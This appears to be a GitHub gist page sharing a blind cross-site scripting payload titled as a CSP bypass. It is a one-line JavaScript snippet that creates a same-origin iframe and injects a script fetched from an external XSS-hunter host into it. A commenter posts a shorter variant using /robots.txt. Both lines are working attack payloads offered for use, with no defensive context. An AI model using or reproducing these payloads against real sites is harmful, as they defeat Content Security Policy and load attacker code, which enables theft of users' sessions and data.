Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
BXSS - CSP Bypass with Inline and Eval
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://rhy.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
@Rhynorater

This comment has been minimized.

@Bo0oM

This comment has been minimized.

Copy link

Bo0oM commented Sep 3, 2018

d=document;f=d.createElement("iframe");f.src="/robots.txt";f.onload=_=>f.contentWindow.document.head.append(s);d.body.append(f);s=d.createElement("script");s.src="//rhy.xss.ht"; :)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.